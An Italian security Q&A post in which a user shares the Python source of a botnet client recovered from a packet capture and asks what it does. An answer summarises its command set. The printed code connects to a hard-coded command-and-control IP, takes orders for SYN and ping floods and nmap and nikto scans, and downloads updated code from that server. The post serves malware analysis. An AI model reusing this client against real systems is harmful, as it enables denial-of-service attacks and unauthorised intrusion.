Ho ottenuto uno script python decrittografato da una pcap da una botnet [chiuso]

0

Ho ottenuto uno script python decrittografato da un file pcap è una comunicazione da una botnet (proberamente il c & c) ma quando inizio lo script non ricevo login o password.

Che cosa fa questo script? E come posso trovare il controller client?

from twisted.internet import reactor
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.protocols.basic import LineReceiver
import os
import re
import random
import sys
import subprocess
from base64 import b64encode, b64decode

class ZeroNetClientProtocol(LineReceiver):
    delimiter = "\n"

    def __init__(self, pass1, pass2):
        self.pass1 = pass1
        self.pass2 = pass2
        self.version = 1.101
        self.state = "INIT"
        self.commands = {
            "DOWNLOAD": {
                "request_args": 1,
                "request_handler": None,
                "response_args": 2,
                "response_handler": self.handleDownloadResponse,
            },
            "NIKTO": {
                "request_args": 2,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "NMAP": {
                "request_args": 2,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "PING": {
                "request_args": 1,
                "request_handler": self.handlePingRequest,
                "response_args": 1,
                "response_handler": None
            },
            "PINGFLOOD": {
                "request_args": 3,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
           },
           "SYNFLOOD": {
                "request_args": 3,
                "request_handler": self.handleAttackRequest,
                "response_args": 2,
                "response_handler": None
            },
            "VERSION": {
                "request_args": 0,
                "request_handler": None,
                "response_args": 1,
                "response_handler": self.handleVersionResponse,
            },
        }
        pass

    def connectionMade(self):
        self.sendLine(self.pass1)
        self.sendLine(self.pass2)

    def lineReceived(self, line):
        print line
        words = line.split()

        if self.state == "INIT" and line == "OK":
            print line
            self.sendLine("VERSION?")
            self.state = "COMMAND"
            return
        elif self.state == "INIT":
            return

        if len(words) <= 0:
            print ("Unknown command")
            return

        matches = re.search(r"^(.+)([?!])$", words[0])
        if not matches:
             print ("Unknown command")
             return

        command = matches.group(1)
        if matches.group(2) == '?':
            command_type = 'REQUEST'
        else:
            command_type = 'RESPONSE'

        if not self.commands.has_key(command):
            print ("Unknown command")
            return

        if command_type == 'REQUEST':
            request_args = self.commands[command]['request_args']
            request_handler = self.commands[command]['request_handler']
            if len(words) - 1 != request_args:
                print ("Unknown command")
                return

            if request_handler:
                request_handler(command, *words[1:])
        else:
            response_args = self.commands[command]['response_args']
            response_handler = self.commands[command]['response_handler']
            if len(words) - 1 != response_args:
                print ("Unknown command")
                return

            if response_handler:
                response_handler(command, *words[1:])

        print command, command_type

    def attack(self, ident, command, arg1, arg2, attack):
        result = subprocess.check_output([command, arg1, str(arg2)])
        self.sendLine("{0}! {1} {2}".format(attack, ident, b64encode(result)))

    def handleAttackRequest(self, command, ident, ip, duration=0):
        if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip) or \
            (duration and not re.match("^[0-9]+$", duration)):
            print ("Unknown command")
            return

        if command == "NIKTO":
            reactor.callInThread(self.attack, ident, "./nikto.sh", ip, 0, command)
        elif command == "NMAP":
            reactor.callInThread(self.attack, ident, "./nmap.sh", ip, 0, command)
        elif command == "SYNFLOOD":
            reactor.callInThread(self.attack, ident, "./synflood.sh", ip, duration,    
            command)
        elif command == "PINGFLOOD":
            reactor.callInThread(self.attack, ident, "./pingflood.sh", ip, duration,    
            command)
        else:
            print ("Unknown command")
            return

    def handleDownloadResponse(self, command, version, data):
        f = open("client.py", "w")
        f.write(b64decode(data))
        f.close()
        reactor.stop()

    def handlePingRequest(self, command, ident):
        self.sendLine("PING! {0}".format(ident))

    def handleVersionResponse(self, command, version):
        if float(version) > self.version:
            self.sendLine("DOWNLOAD? {0}".format(str(float(version))))

class ZeroNetClientProtocolFactory(ReconnectingClientFactory):
    def __init__(self, pass1, pass2):
        self.pass1 = pass1
        self.pass2 = pass2

    def buildProtocol(self, addr):
        return ZeroNetClientProtocol(self.pass1, self.pass2)

import sys

if len(sys.argv) != 3:
    print "Usage: client.py <primary password> <secondary password>"
    sys.exit(1)

pass1 = sys.argv[1]
pass2 = sys.argv[2]

reactor.connectTCP("82.94.242.254", 8123, ZeroNetClientProtocolFactory(pass1, pass2))
reactor.run()
    
posta Mark 11.01.2014 - 14:49
fonte

1 risposta

2

Lo script python si collega all'IP 82.94.242.254 sulla porta 8123 , autentica usando pass1 e pass2 e quindi inizia a ricevere comandi dal C & C. I comandi sono DOWNLOAD , NIKTO , NMAP , PING , PINGFLOOD , SYNFLOOD e VERSION . Molti di questi attivano l'esecuzione di uno script .sh.

Dai nomi possiamo intuire il tipo di comandi disponibili, che sono principalmente attacchi DDoS (flood PING e SYN), ricognizione usando nmap (network discovery) e nikto (web vulnerability scanner) e altri per il mantenimento del bot (download e numero di versione).

    
risposta data 11.01.2014 - 19:04
fonte

Leggi altre domande sui tag